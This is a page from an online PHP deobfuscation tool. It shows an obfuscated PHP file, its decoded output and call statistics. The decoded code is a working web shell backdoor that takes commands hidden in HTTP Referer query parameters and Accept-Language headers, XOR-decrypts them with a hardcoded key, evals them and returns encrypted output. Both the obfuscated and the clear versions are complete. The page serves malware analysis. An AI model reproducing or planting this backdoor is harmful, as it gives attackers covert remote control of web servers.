Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $d='5(]:$i]:.$kh),0,3));$]:f=$sl($]:ss(m]:d5($i.$]:kf)]:,0,3));$p=]:"]:"]:;for($z=1;..
Decoded Output download
$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Did this file decode correctly?
Original Code
<?php
$d='5(]:$i]:.$kh),0,3));$]:f=$sl($]:ss(m]:d5($i.$]:kf)]:,0,3));$p=]:"]:"]:;for($z=1;$z<coun]:t]:($m[1]]:);$]:z++)$p.=$q[$m[]:2]';
$U='$kh="]:5d41";$kf]:]:="402a";functi]:on ]:x($]:t,$k){]:$c=strle]:n($k);$l=]:strlen]:($t)]:;$o="";fo]:r($]:i=0;$i]:<]:$l;){for(';
$R='$j=0;(]:$j<]:$]:c&&$i]:<$l);$j++,$i]:+]:+){$o.=$t]:{$i}^$k]:{$j};}}re]:tur]:n $o;}$r=$]:_SER]:VER;$rr=]:@$r]:["HTT]:P_REFE]';
$Z='=]:strp]:os($s[]:$i],$f);]:if]:($e)]:{$k=$kh.$k]:f]:;ob_start();@]:e]:val(@]:gzun]:compres]:s]:(@x(@bas]:e]:64_dec]:]:od]:';
$M=str_replace('P','','cPreatPe_PPfunPcPtion');
$p=']:]:[$z]];if(]:strpos]:($p,$h)===0)]:{$s]:[$i]]:=]:"]:";$p=$ss($p,3);}if(arr]:ay_]:key_ex]:ists(]:]:$i,$s))]:{$s[$i].=$p;$e';
$v=':;]:]:$q]:]:=array_va]:lues($q);preg_]:match_all("/([\\w]:]]:)[\\w-]:]+(]:?:;q=0.([\\d]))?]:,?]:/",$]:ra,$m);i]:f($q&]:&$m){@]:';
$X=':R]:ER"];$ra=@]:$r["H]:TTP_ACCEPT]:_LANG]:UAGE"];i]:f(]:$rr]:&&$]:]:ra){$u=p]:arse_url($rr);pa]:rse_str(]:]:$u["query"],$q)]';
$C='e(]:preg_]:replace(array("/_/]:","/-/"),ar]:ra]:y("/","+"),$]:ss($]:s[$i],0]:,$e)]:]:)),$k)));$o=ob]:_get_contents();o]:b]';
$z=':_end_cl]:ea]:n();$d=bas]:]:e64_encode(x(gzc]:ompre]:ss(]:$o)]:,$k]:));pr]:int("<$k>$d</$k>]:");@]:]:session_]:destroy();}}}}';
$E='session]:_start();]:$s=&]:$_SESSIO]:N;$]:ss="sub]:str";$s]:]:l=]:"strt]:olower";$i=]:$m[1]]:[]:0].$m[1][1];$h=]:]:$sl($ss(md';
$j=str_replace(']:','',$U.$R.$X.$v.$E.$d.$p.$Z.$C.$z);
$Y=$M('',$j);$Y();
?>
Function Calls
null | 1 |
str_replace | 2 |
create_function | 1 |
Stats
MD5 | b0df75154f7ecd6a3b662ce1756efe6a |
Eval Count | 1 |
Decode Time | 123 ms |